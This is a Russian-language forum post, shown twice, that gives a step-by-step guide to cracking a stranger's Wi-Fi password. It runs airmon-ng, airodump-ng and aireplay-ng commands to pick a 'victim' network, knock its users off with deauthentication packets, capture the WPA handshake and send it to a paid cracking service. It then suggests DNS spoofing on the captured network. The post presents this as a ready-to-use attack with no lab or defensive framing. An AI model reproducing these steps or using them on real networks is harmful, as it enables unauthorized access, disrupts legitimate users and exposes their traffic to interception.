Очень легкий способ для взлома Вай Фая)
Скачиваем kali linux -
Устанавливаем кали линукс на флешку или виртуальную машину
Запускаемся с флешки или виртуальной машины под кали
Открываем консоль.
Пишем такое слово - iwconfig и проверяем, определяется ли наша сетевая карта! Если у вас на этом моменте проблемы(с ноутбуками такого не будет), то вам нужно докупить эту карту. За 300 рублей можно взять юсб карту тплинк с алика и все будет в шоколаде.
Теперь включаем режим мониторинга - airmon-ng start wlan0(влан0 - это значение из параметров сетевой карты, у вас оно может быть немного иное, например mon0)
Теперь нужно провести сканирование - airodump-ng wlan0
Здесь мы увидим список вай фай сетей в радиусе нашего аппарата, зависит от сетевой карты. Здесь нужно выбрать объект атаки, выбираем на свой вкус(Уровень сигнала определяется сокращением pwr)
Теперь нам нужно нажать ctrl+c и остановить сканирование
Выбрали жертву и пишем - airodump-ng --bssid (здесь пишем бссайди роутера жертвы, его вы видите выше) --channel(тут пишем канал, он обозначивается как ch, например 1 или 8) -w /tmp/nazvanie (это путь где будет конечный файл и название) wlan0
В самом низу видим тех, кто подключен к сети, выбираем того у кого в значении Frames большее количество(он более активен)
Открываем еще одну консоль и пишем: aireplay-ng -0 1(1 - это кол-во пакетов деавторизации, ставьте сразу 50 и ждите) -а (здесь пишем бссайди роутера, его видим в самой верхней строке где его характеристики: уровень сигнала, канал и тд) -с (мак адрес пользователя, которого атакуем, узнать его мак можно под надписью STATION) wlan0
Ждем пока в первой консоли будет надпись с хендшейком, там еще время будет указано, она будет вверху. Делаем во второй консоли эту команду пока не пройдет хендшейк. Если совсем не проходит, то пишем эту команду заместо той: aireplay-ng -0 1 -a AP_BSSID -c CLIENT_BSSID mon0 —ignore-negative-one( это для андроид устройств), еще можно деавторизовать сразу всю сеть aireplay-ng --deauth 5 -a (тут прописываешь мак роутера) wlan0
Когда получили хендшейк, идем по пути который мы указали и:
Расшифровываем этот хеш сами, даем людям которые могут это сделать
Обращаемся к сервису
После расшифровки вам на почту придет письмо-оповещение, а чтобы получить пароль нужен ключ, 1 стоит 100 рублей, чем больше - тем дешевле. Это единственный минус этого способа, но я предпочитаю его. После покупки ключа он придет на почту, далее вводите его на сайте и готово.
Вот и готово, далее с нашей, теперь нашей! сетью делаем что хотим: подменяем днс,смотреть фильмы и т.п.)
Скачиваем kali linux -
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Устанавливаем кали линукс на флешку или виртуальную машину
Запускаемся с флешки или виртуальной машины под кали
Открываем консоль.
Пишем такое слово - iwconfig и проверяем, определяется ли наша сетевая карта! Если у вас на этом моменте проблемы(с ноутбуками такого не будет), то вам нужно докупить эту карту. За 300 рублей можно взять юсб карту тплинк с алика и все будет в шоколаде.
Теперь включаем режим мониторинга - airmon-ng start wlan0(влан0 - это значение из параметров сетевой карты, у вас оно может быть немного иное, например mon0)
Теперь нужно провести сканирование - airodump-ng wlan0
Здесь мы увидим список вай фай сетей в радиусе нашего аппарата, зависит от сетевой карты. Здесь нужно выбрать объект атаки, выбираем на свой вкус(Уровень сигнала определяется сокращением pwr)
Теперь нам нужно нажать ctrl+c и остановить сканирование
Выбрали жертву и пишем - airodump-ng --bssid (здесь пишем бссайди роутера жертвы, его вы видите выше) --channel(тут пишем канал, он обозначивается как ch, например 1 или 8) -w /tmp/nazvanie (это путь где будет конечный файл и название) wlan0
В самом низу видим тех, кто подключен к сети, выбираем того у кого в значении Frames большее количество(он более активен)
Открываем еще одну консоль и пишем: aireplay-ng -0 1(1 - это кол-во пакетов деавторизации, ставьте сразу 50 и ждите) -а (здесь пишем бссайди роутера, его видим в самой верхней строке где его характеристики: уровень сигнала, канал и тд) -с (мак адрес пользователя, которого атакуем, узнать его мак можно под надписью STATION) wlan0
Ждем пока в первой консоли будет надпись с хендшейком, там еще время будет указано, она будет вверху. Делаем во второй консоли эту команду пока не пройдет хендшейк. Если совсем не проходит, то пишем эту команду заместо той: aireplay-ng -0 1 -a AP_BSSID -c CLIENT_BSSID mon0 —ignore-negative-one( это для андроид устройств), еще можно деавторизовать сразу всю сеть aireplay-ng --deauth 5 -a (тут прописываешь мак роутера) wlan0
Когда получили хендшейк, идем по пути который мы указали и:
Расшифровываем этот хеш сами, даем людям которые могут это сделать
Обращаемся к сервису
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
(не рекл) и кидаем сюда хеш, он быстро находит(у меня за пару секунд), может быть дольше.После расшифровки вам на почту придет письмо-оповещение, а чтобы получить пароль нужен ключ, 1 стоит 100 рублей, чем больше - тем дешевле. Это единственный минус этого способа, но я предпочитаю его. После покупки ключа он придет на почту, далее вводите его на сайте и готово.
Вот и готово, далее с нашей, теперь нашей! сетью делаем что хотим: подменяем днс,смотреть фильмы и т.п.)